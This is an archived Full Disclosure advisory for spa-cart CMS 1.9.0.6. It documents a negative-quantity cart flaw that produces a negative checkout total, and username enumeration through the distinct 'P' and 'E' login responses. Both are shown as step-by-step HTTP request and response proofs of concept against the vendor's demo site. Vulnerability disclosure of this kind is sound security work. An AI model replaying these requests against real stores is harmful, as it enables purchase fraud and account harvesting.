lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAF2Wu1ajm6uzcmSnjkR9Gk9DK-WqfTis5kCCyg8q8M=ERiSEqA@mail.gmail.com>
Date: Fri, 14 Jun 2024 06:30:17 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Business Logic Flaw and Username Enumeration in
	spa-cartcmsv1.9.0.6

# Exploit Title: Business Logic Flaw and Username Enumeration in
spa-cartcmsv1.9.0.6
# Date: 6/2024
# Exploit Author: Andrey Stoykov
# Version:  1.9.0.6
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html
<http://msecureltd.blogspot.com/>


Description

- It was found that the application suffers from business logic flaw

- Additionally the application is vulnerable to username enumeration on the
login page


Logic Flaw

Steps to Reproduce:


   1. Checkout page and intercept HTTP POST request
   2. Add minus quantity such as -10
   3. The final price would come up as negative value


// HTTP POST request modifying the quantity to negative value

POST /cart/add HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[...]

productid=225&amount=-10


// HTTP response

HTTP/2 200 OK
Server: nginx
[...]

[...]
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg"
alt="" /><b>Five And Two Jewelry Piper Gold-Plated Earrings</b> added to
cart
<br /><br />
<strong class="added_price">Price: <span><span
class="currency">$</span>59.00</span></strong>
<div class="added_options">
<b>Selected options:</b>
Qty: 1<br />
Color: silver gold<br />
</div>
[...]


// HTTP GET request to checkout

GET /checkout HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[...]


// HTTP response showing negative amount owned

HTTP/2 200 OK
Server: nginx
[...]

[...]
\t<td>silver gold<\/td>\r\n<\/tr>\r\n<\/table>\r\n <\/td>\r\n <td
class=\"line\" nowrap align=\"right\">\r\n<span
class=\"currency\">$<\/span>59.00 x -10 =
<span class=\"currency\">$<\/span>-590.00 <\/td>
[...]


Username Enumeration:

Steps to Reproduce:

   1. Register account
   2. Enter valid account with wrong password
   3. Trap HTTP request
   4. Check that response for valid username has "P" message
   5. Enter invalid account with wrong password
   6. Check that response for invalid username has "E" message


// HTTP POST request with valid username and wrong password

POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[...]

email=test%40test.test&password=test123


// HTTP response showing "P" error message

HTTP/2 200 OK
Server: nginx
[...]

P

// HTTP POST request with invalid username and wrong password

POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[...]

email=test%40test.t3st&password=test123


// HTTP response showing "E" error message

HTTP/2 200 OK
Server: nginx
[...]

E
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ